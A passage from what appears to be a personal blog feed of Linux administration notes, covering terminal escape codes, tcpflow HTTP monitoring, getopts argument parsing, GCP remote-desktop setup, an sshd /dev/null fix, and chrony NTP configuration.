id="the-magic-code-0330kr">The &ldquo;Magic Code&rdquo;: <code>\033[0K\r</code></h5> <ul> <li><code>-n</code> option asks the echo command to stop outputting the trailing newline character</li> <li><code>-e</code> option allows the echo command to interpret backslash escapes such as <code>\n</code> (newline) and <code>\r</code> (carriage return)</li> <li><code>\033</code> - It&rsquo;s the escape sequence. In other words, it&rsquo;s ESC.</li> <li><code>\033[</code> - Then this becomes &ldquo;ESC [&rdquo;, which is the control sequence introducer (CSI).</li> <li><code>\033[0k</code> - So it&rsquo;s &ldquo;CSI 0 K&rdquo;. Further, &ldquo;CSI 0 K&rdquo; erases the text from the cursor to the end of the line.</li> <li><code>\r</code> - This is the carriage return. It brings the cursor to the beginning of the line.</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ cat print_status.sh </span></span><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash</span> </span></span><span style="display:flex;"><span>echo -ne <span style="color:#e6db74">&#34;[INFO] Processing file: readme.txt\033[0K\r&#34;</span> </span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>echo -ne <span style="color:#e6db74">&#34;[INFO] Processing file: veryPowerfulService.service\033[0K\r&#34;</span> </span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>echo -e <span style="color:#e6db74">&#34;[INFO] Processing file: log.txt\033[0K\r&#34;</span> </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;DONE&#34;</span> </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>!/bin/bash </span></span><span style="display:flex;"><span>printf <span style="color:#e6db74">&#34;[INFO] Processing file: readme.txt\033[0K\r&#34;</span> </span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>printf <span style="color:#e6db74">&#34;[INFO] Processing file: veryPowerfulService.service\033[0K\r&#34;</span> </span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>printf <span style="color:#e6db74">&#34;[INFO] Processing file: log.txt\033[0K\r\n&#34;</span> </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;DONE&#34;</span> </span></span></code></pre></div>https://linzeyan.github.io/posts/2022/20220623-monitoring-http-requests-network-interfaces/Thu, 23 Jun 2022 16:48:42 +0800https://linzeyan.github.io/posts/2022/20220623-monitoring-http-requests-network-interfaces/<ul> <li><a href="https://www.baeldung.com/linux/monitoring-http-requests-network-interfaces" target="_blank" rel="noopener">Monitoring HTTP Requests on a Network Interface in Real Time</a></li> </ul> <h3 id="tcpflow">tcpflow</h3> <blockquote> <p><code>apt/dnf install tcpflow</code></p></blockquote> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ sudo tcpflow -p -c -i wlp0s20f3 port <span style="color:#ae81ff">80</span> | grep -oE <span style="color:#e6db74">&#39;(GET|POST) .* HTTP/1.[01]|Host: .*&#39;</span> </span></span><span style="display:flex;"><span>reportfilename: ./report.xml </span></span><span style="display:flex;"><span>tcpflow: listening on wlp0s20f3 </span></span><span style="display:flex;"><span>GET /alexlarsson/flatpak/ubuntu/dists/focal/InRelease HTTP/1.1 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>GET /mirrors.txt HTTP/1.1 </span></span></code></pre></div><ul> <li><code>-p</code> disables promiscuous mode</li> <li><code>-c</code> means only print the output to the console and don&rsquo;t create files</li> <li><code>-i</code> specifies the network interface grep receives the output of tcpflow</li> <li><code>-o</code> means show only the matching parts of the lines that match the pattern</li> <li><code>-E</code> means the pattern is an extended regular expression (ERE)</li> </ul> <h3 id="httpry">httpry</h3> <blockquote> <p><code>https://github.com/jbittel/httpry.git</code></p>https://linzeyan.github.io/posts/2022/20220607-bash-parse-command-line-arguments/Tue, 07 Jun 2022 14:48:47 +0800https://linzeyan.github.io/posts/2022/20220607-bash-parse-command-line-arguments/<ul> <li><a href="https://www.baeldung.com/linux/bash-parse-command-line-arguments" target="_blank" rel="noopener">Parse Command Line Arguments in Bash</a></li> </ul> <h3 id="getopts">getopts</h3> <blockquote> <p><code>getopts optstring opt [arg ...]</code></p></blockquote> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> getopts <span style="color:#e6db74">&#39;abc:h&#39;</span> opt; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#34;</span>$opt<span style="color:#e6db74">&#34;</span> in </span></span><span style="display:flex;"><span> a<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing option &#39;a&#39;&#34;</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> b<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing option &#39;b&#39;&#34;</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> c<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> arg<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$OPTARG<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing option &#39;c&#39; with &#39;</span><span style="color:#e6db74">${</span>OPTARG<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; argument&#34;</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> ?|h<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Usage: </span><span style="color:#66d9ef">$(</span>basename $0<span style="color:#66d9ef">)</span><span style="color:#e6db74"> [-a] [-b] [-c arg]&#34;</span> </span></span><span style="display:flex;"><span> exit <span style="color:#ae81ff">1</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">esac</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span>shift <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$((</span>$OPTIND <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span><span style="color:#66d9ef">))</span><span style="color:#e6db74">&#34;</span> </span></span></code></pre></div><ul> <li>optstring represents the supported options. The option expects an argument if there is a colon (:) after it. For instance, if option c expects an argument, then it would be represented as c: in the optstring</li> <li>When an option has an associated argument, then getopts stores the argument as a string in the OPTARG shell variable. For instance, the argument passed to option c would be stored in the OPTARG variable.</li> <li>opt contains the parsed option.</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> getopts <span style="color:#e6db74">&#39;:abc:h&#39;</span> opt; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#34;</span>$opt<span style="color:#e6db74">&#34;</span> in </span></span><span style="display:flex;"><span> a<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing option &#39;a&#39;&#34;</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> b<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing option &#39;b&#39;&#34;</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> c<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> arg<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$OPTARG<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing option &#39;c&#39; with &#39;</span><span style="color:#e6db74">${</span>OPTARG<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; argument&#34;</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> h<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Usage: </span><span style="color:#66d9ef">$(</span>basename $0<span style="color:#66d9ef">)</span><span style="color:#e6db74"> [-a] [-b] [-c arg]&#34;</span> </span></span><span style="display:flex;"><span> exit <span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> :<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo -e <span style="color:#e6db74">&#34;option requires an argument.\nUsage: </span><span style="color:#66d9ef">$(</span>basename $0<span style="color:#66d9ef">)</span><span style="color:#e6db74"> [-a] [-b] [-c arg]&#34;</span> </span></span><span style="display:flex;"><span> exit <span style="color:#ae81ff">1</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> ?<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo -e <span style="color:#e6db74">&#34;Invalid command option.\nUsage: </span><span style="color:#66d9ef">$(</span>basename $0<span style="color:#66d9ef">)</span><span style="color:#e6db74"> [-a] [-b] [-c arg]&#34;</span> </span></span><span style="display:flex;"><span> exit <span style="color:#ae81ff">1</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">esac</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span>shift <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$((</span>$OPTIND <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span><span style="color:#66d9ef">))</span><span style="color:#e6db74">&#34;</span> </span></span></code></pre></div><ul> <li>Note that we&rsquo;ve updated optstring as well. Now it starts with the colon(:) character, which suppresses the default error message.</li> <li>The getopts function disables error reporting when the OPTERR variable is set to zero.</li> </ul> <h3 id="parsing-long-command-line-options-with-getopt">Parsing Long Command-Line Options With getopt</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> </span></span><span style="display:flex;"><span>VALID_ARGS<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>getopt -o abg:d: --long alpha,beta,gamma:,delta: -- <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> $? -ne <span style="color:#ae81ff">0</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span> </span></span><span style="display:flex;"><span> exit 1; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>eval set -- <span style="color:#e6db74">&#34;</span>$VALID_ARGS<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> <span style="color:#f92672">[</span> : <span style="color:#f92672">]</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#34;</span>$1<span style="color:#e6db74">&#34;</span> in </span></span><span style="display:flex;"><span> -a | --alpha<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing &#39;alpha&#39; option&#34;</span> </span></span><span style="display:flex;"><span> shift </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> -b | --beta<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing &#39;beta&#39; option&#34;</span> </span></span><span style="display:flex;"><span> shift </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> -g | --gamma<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing &#39;gamma&#39; option. Input argument is &#39;</span>$2<span style="color:#e6db74">&#39;&#34;</span> </span></span><span style="display:flex;"><span> shift <span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> -d | --delta<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> echo <span style="color:#e6db74">&#34;Processing &#39;delta&#39; option. Input argument is &#39;</span>$2<span style="color:#e6db74">&#39;&#34;</span> </span></span><span style="display:flex;"><span> shift <span style="color:#ae81ff">2</span> </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> --<span style="color:#f92672">)</span> shift; </span></span><span style="display:flex;"><span> break </span></span><span style="display:flex;"><span> ;; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">esac</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span></code></pre></div><ul> <li><code>-o</code> option represents the short command-line options</li> <li><code>--long</code> option represents the long command-line options</li> </ul>https://linzeyan.github.io/posts/2021/20211020-google-cloud-platform-gcp-access-linux-server-using-gui-running-in-gcp-instance-using-windows/Wed, 20 Oct 2021 16:15:48 +0800https://linzeyan.github.io/posts/2021/20211020-google-cloud-platform-gcp-access-linux-server-using-gui-running-in-gcp-instance-using-windows/<ul> <li><a href="https://medium.com/tech-guides/google-cloud-platform-gcp-access-linux-server-using-gui-running-in-gcp-instance-using-windows-201e315925a6" target="_blank" rel="noopener">Google Cloud Platform(GCP): Access Linux Server using GUI running in GCP instance using Windows Remote Desktop Connection.</a></li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># This will install GUI and make it as a default startup option and then restart the machine.</span> </span></span><span style="display:flex;"><span>$ sudo yum install xrdp tigervnc-server </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>~# sudo su </span></span><span style="display:flex;"><span>~# passwd </span></span><span style="display:flex;"><span>~# systemctl enable --now xrdp </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>~# netstat -antup | grep xrdp </span></span><span style="display:flex;"><span>tcp <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">0</span> 0.0.0.0:3389 0.0.0.0:* LISTEN 10202/xrdp </span></span><span style="display:flex;"><span>tcp <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">0</span> 127.0.0.1:3350 0.0.0.0:* LISTEN 10201/xrdp-sesman </span></span></code></pre></div>https://linzeyan.github.io/posts/2021/20211020-gcp-remote-desktop/Wed, 20 Oct 2021 16:14:47 +0800https://linzeyan.github.io/posts/2021/20211020-gcp-remote-desktop/<ul> <li><a href="https://medium.com/@huiqinng/%E7%AD%86%E8%A8%98-%E5%9C%A8gcp%E4%B8%8A%E5%BB%BA%E7%AB%8B%E5%8F%AFremote-dekstop%E7%9A%84ubuntu%E7%92%B0%E5%A2%83-e56fdbd3a4f2" target="_blank" rel="noopener">[Notes] Build an Ubuntu remote desktop environment on GCP</a></li> </ul> <h4 id="install">Install</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># dependency</span> </span></span><span style="display:flex;"><span>sudo apt-get install ubuntu-desktop gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># VNC Server</span> </span></span><span style="display:flex;"><span>sudo apt-get install vnc4server </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># After install, run vncserver and set the password when prompted</span> </span></span><span style="display:flex;"><span>vncserver </span></span></code></pre></div><h4 id="modify-vncxstartup">Modify <code>~/.vnc/xstartup</code></h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/sh </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Uncomment the following two lines for normal desktop:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># unset SESSION_MANAGER</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># exec /etc/X11/xinit/xinitrc</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> -x /etc/vnc/xstartup <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> exec /etc/vnc/xstartup </span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> -r $HOME/.Xresources <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> xrdb $HOME/.Xresources </span></span><span style="display:flex;"><span>xsetroot -solid grey </span></span><span style="display:flex;"><span>vncconfig -iconic &amp; </span></span><span style="display:flex;"><span>x-terminal-emulator -geometry 80x24+10+10 -ls -title <span style="color:#e6db74">&#34;</span>$VNCDESKTOP<span style="color:#e6db74"> Desktop&#34;</span> &amp; </span></span><span style="display:flex;"><span>x-window-manager &amp; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>gnome-panel &amp; </span></span><span style="display:flex;"><span>gnome-settings-daemon &amp; </span></span><span style="display:flex;"><span>metacity &amp; </span></span><span style="display:flex;"><span>nautilus &amp; </span></span></code></pre></div><h4 id="execute">Execute</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Kill the current vncserver and restart</span> </span></span><span style="display:flex;"><span>vncserver -kill :1 </span></span><span style="display:flex;"><span><span style="color:#75715e"># vncserver defaults to port 5900; :1 is 5901, and so on</span> </span></span><span style="display:flex;"><span>vncserver :1 </span></span></code></pre></div><h4 id="start-vncserver-on-reboot">Start vncserver on reboot</h4> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>@reboot /usr/bin/vncserver :1 </span></span></code></pre></div>https://linzeyan.github.io/posts/2021/20210922-shellbian-cheng-zhi-chang-yong-ji-qiao/Wed, 22 Sep 2021 13:01:11 +0800https://linzeyan.github.io/posts/2021/20210922-shellbian-cheng-zhi-chang-yong-ji-qiao/<ul> <li><a href="https://zorrozou.github.io/docs/books/shellbian-cheng-zhi-chang-yong-ji-qiao.html" target="_blank" rel="noopener">Common shell scripting tips</a></li> <li><a href="https://zorrozou.github.io/docs/books/shellbian-cheng-zhi-nei-jian-ming-ling.html" target="_blank" rel="noopener">Shell scripting built-in commands</a></li> <li><a href="https://zorrozou.github.io/docs/books/shellbian-cheng-zhi-te-shu-fu-hao.html" target="_blank" rel="noopener">Shell scripting special symbols</a></li> </ul>https://linzeyan.github.io/posts/2021/20210304-ssh-failing-with-error-fatal-daemon-failed-no-such-device/Thu, 04 Mar 2021 18:48:39 +0800https://linzeyan.github.io/posts/2021/20210304-ssh-failing-with-error-fatal-daemon-failed-no-such-device/<ul> <li><a href="https://admin-ahead.com/forum/general-linux/ssh-failing-with-error-fatal-daemon%28%29-failed-no-such-device/" target="_blank" rel="noopener">SSH failing with Error : fatal: daemon() failed: No such device</a></li> </ul> <p>/var/log/secure</p> <p><code>Oct 10 10:58:05 vps sshd[23799]: fatal: daemon() failed: No such device</code></p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># rm -vf /dev/null</span> </span></span><span style="display:flex;"><span>removed <span style="color:#e6db74">`</span>/dev/null<span style="color:#e6db74">`</span> </span></span><span style="display:flex;"><span>-bash-3.2# mknod /dev/null c <span style="color:#ae81ff">1</span> <span style="color:#ae81ff">3</span> </span></span><span style="display:flex;"><span>Started SSH and the SSH started responding: </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># service sshd restart</span> </span></span><span style="display:flex;"><span>Stopping sshd: <span style="color:#f92672">[</span> OK <span style="color:#f92672">]</span> </span></span><span style="display:flex;"><span>Starting sshd: <span style="color:#f92672">[</span> OK <span style="color:#f92672">]</span> </span></span><span style="display:flex;"><span>-bash-3.2# service sshd status </span></span><span style="display:flex;"><span>openssh-daemon <span style="color:#f92672">(</span>pid 30608<span style="color:#f92672">)</span> is running… </span></span></code></pre></div>https://linzeyan.github.io/posts/2020/20201109-145053/Mon, 09 Nov 2020 12:12:32 +0800https://linzeyan.github.io/posts/2020/20201109-145053/<ul> <li><a href="https://www.dotblogs.com.tw/zerroyuy/2020/08/20/145053" target="_blank" rel="noopener">Mount a Synology NAS folder on CentOS 7</a></li> </ul>https://linzeyan.github.io/posts/2020/20200929-how-to-config-chronyd-on-rhel7-centos7/Tue, 29 Sep 2020 11:41:43 +0800https://linzeyan.github.io/posts/2020/20200929-how-to-config-chronyd-on-rhel7-centos7/<ul> <li><a href="https://blog.skywebster.com/how-to-config-chronyd-on-rhel7-centos7/" target="_blank" rel="noopener">How to configure time zone and NTP on RHEL7/CentOS7</a></li> </ul> <p>chrony includes two programs: chronyd is a daemon that starts on boot, and chronyc is a command-line client that can monitor chronyd and change runtime parameters.</p> <p>Use either ntpd or chronyd, not both.</p> <h5 id="configure-time-zone">Configure time zone</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>~# timedatectl set-timezone Asia/Taipei </span></span><span style="display:flex;"><span>~# timedatectl </span></span><span style="display:flex;"><span> Local time: Tue 2018-03-27 14:13:38 CST </span></span><span style="display:flex;"><span> Universal time: Tue 2018-03-27 06:13:38 UTC </span></span><span style="display:flex;"><span> RTC time: Tue 2018-03-27 06:13:40 </span></span><span style="display:flex;"><span> Time zone: Asia/Taipei <span style="color:#f92672">(</span>CST, +0800<span style="color:#f92672">)</span> </span></span><span style="display:flex;"><span> NTP enabled: no </span></span><span style="display:flex;"><span>NTP synchronized: no </span></span><span style="display:flex;"><span> RTC in local TZ: no </span></span><span style="display:flex;"><span> DST active: n/a </span></span></code></pre></div><h5 id="configure-chronyd">Configure chronyd</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e"># Install</span> </span></span><span style="display:flex;"><span>~# yum install -y chrony </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Config file</span> </span></span><span style="display:flex;"><span>~# cat /etc/chrony.conf </span></span><span style="display:flex;"><span><span style="color:#75715e"># Use public servers from the pool.ntp.org project.</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Please consider joining the pool (http://www.pool.ntp.org/join.html).</span> </span></span><span style="display:flex;"><span>server 0.tw.pool.ntp.org iburst ---&gt;改成本地的伺服器 </span></span><span style="display:flex;"><span>server 1.tw.pool.ntp.org iburst ---&gt;改成本地的伺服器 </span></span><span style="display:flex;"><span>server 2.tw.pool.ntp.org iburst ---&gt;改成本地的伺服器 </span></span><span style="display:flex;"><span>server 3.tw.pool.ntp.org iburst ---&gt;改成本地的伺服器 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Start service and enable on boot</span> </span></span><span style="display:flex;"><span>~# systemctl enable chronyd </span></span><span style="display:flex;"><span>~# systemctl start chronyd </span></span></code></pre></div><h5 id="tracking-parameters-show-system-time-performance">tracking parameters show system time performance</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>~# chronyc tracking </span></span><span style="display:flex;"><span>Reference ID : 3DD8996B <span style="color:#f92672">(</span>61-216-153-107.hinet-ip.hinet.net<span style="color:#f92672">)</span> ---&gt;表示現在同步的時間伺服器，如果沒有id表示沒有同步 </span></span><span style="display:flex;"><span>Stratum : <span style="color:#ae81ff">4</span> ---&gt;表示計算機有多少<span style="color:#e6db74">&#34;跳hop&#34;</span> 表示本地的是第四層 </span></span><span style="display:flex;"><span>Ref time <span style="color:#f92672">(</span>UTC<span style="color:#f92672">)</span> : Tue Mar <span style="color:#ae81ff">27</span> 06:03:38 <span style="color:#ae81ff">2018</span> ---&gt;最後一次測量的時間 </span></span><span style="display:flex;"><span>System time : 0.000040356 seconds fast of NTP time ---&gt;調整系統時間 </span></span><span style="display:flex;"><span>Last offset : +0.000163738 seconds </span></span><span style="display:flex;"><span>RMS offset : 0.000163738 seconds </span></span><span style="display:flex;"><span>Frequency : 21.384 ppm fast </span></span><span style="display:flex;"><span>Residual freq : +0.000 ppm </span></span><span style="display:flex;"><span>Skew : 675.319 ppm </span></span><span style="display:flex;"><span>Root delay : 0.008527911 seconds </span></span><span style="display:flex;"><span>Root dispersion : 0.066466033 seconds </span></span><span style="display:flex;"><span>Update interval : 2.0 seconds </span></span><span style="display:flex;"><span>Leap status : Normal ---&gt;Normal要顯示此值, Insert second, Delete second or Not synchronised. </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>~# chronyc sources -v </span></span><span style="display:flex;"><span><span style="color:#ae81ff">210</span> Number of sources <span style="color:#f92672">=</span> <span style="color:#ae81ff">4</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> .-- Source mode <span style="color:#e6db74">&#39;^&#39;</span> <span style="color:#f92672">=</span> server, <span style="color:#e6db74">&#39;=&#39;</span> <span style="color:#f92672">=</span> peer, <span style="color:#e6db74">&#39;#&#39;</span> <span style="color:#f92672">=</span> local clock. </span></span><span style="display:flex;"><span> / .- Source state <span style="color:#e6db74">&#39;*&#39;</span> <span style="color:#f92672">=</span> current synced, <span style="color:#e6db74">&#39;+&#39;</span> <span style="color:#f92672">=</span> combined , <span style="color:#e6db74">&#39;-&#39;</span> <span style="color:#f92672">=</span> not combined, </span></span><span style="display:flex;"><span>| / <span style="color:#e6db74">&#39;?&#39;</span> <span style="color:#f92672">=</span> unreachable, <span style="color:#e6db74">&#39;x&#39;</span> <span style="color:#f92672">=</span> time may be in error, <span style="color:#e6db74">&#39;~&#39;</span> <span style="color:#f92672">=</span> time too variable. </span></span><span style="display:flex;"><span><span style="color:#f92672">||</span> .- xxxx <span style="color:#f92672">[</span> yyyy <span style="color:#f92672">]</span> +/- zzzz </span></span><span style="display:flex;"><span><span style="color:#f92672">||</span> Reachability register <span style="color:#f92672">(</span>octal<span style="color:#f92672">)</span> -. | xxxx <span style="color:#f92672">=</span> adjusted offset, </span></span><span style="display:flex;"><span><span style="color:#f92672">||</span> Log2<span style="color:#f92672">(</span>Polling interval<span style="color:#f92672">)</span> --. | | yyyy <span style="color:#f92672">=</span> measured offset, </span></span><span style="display:flex;"><span><span style="color:#f92672">||</span> <span style="color:#ae81ff">\ </span> | | zzzz <span style="color:#f92672">=</span> estimated error. </span></span><span style="display:flex;"><span><span style="color:#f92672">||</span> | | <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>MS Name/IP address Stratum Poll Reach LastRx Last sample </span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================================</span> </span></span><span style="display:flex;"><span>^* 59-124-29-241.hinet-ip.h&gt; <span style="color:#ae81ff">3</span> <span style="color:#ae81ff">6</span> <span style="color:#ae81ff">37</span> <span style="color:#ae81ff">24</span> -1462us<span style="color:#f92672">[</span>-2363us<span style="color:#f92672">]</span> +/- 49ms </span></span><span style="display:flex;"><span>^+ 61-216-153-107.hinet-ip.&gt; <span style="color:#ae81ff">3</span> <span style="color:#ae81ff">6</span> <span style="color:#ae81ff">37</span> <span style="color:#ae81ff">23</span> -556us<span style="color:#f92672">[</span> -556us<span style="color:#f92672">]</span> +/- 64ms </span></span><span style="display:flex;"><span>^? 59-125-122-217.hinet-ip.&gt; <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">7</span> <span style="color:#ae81ff">0</span> - 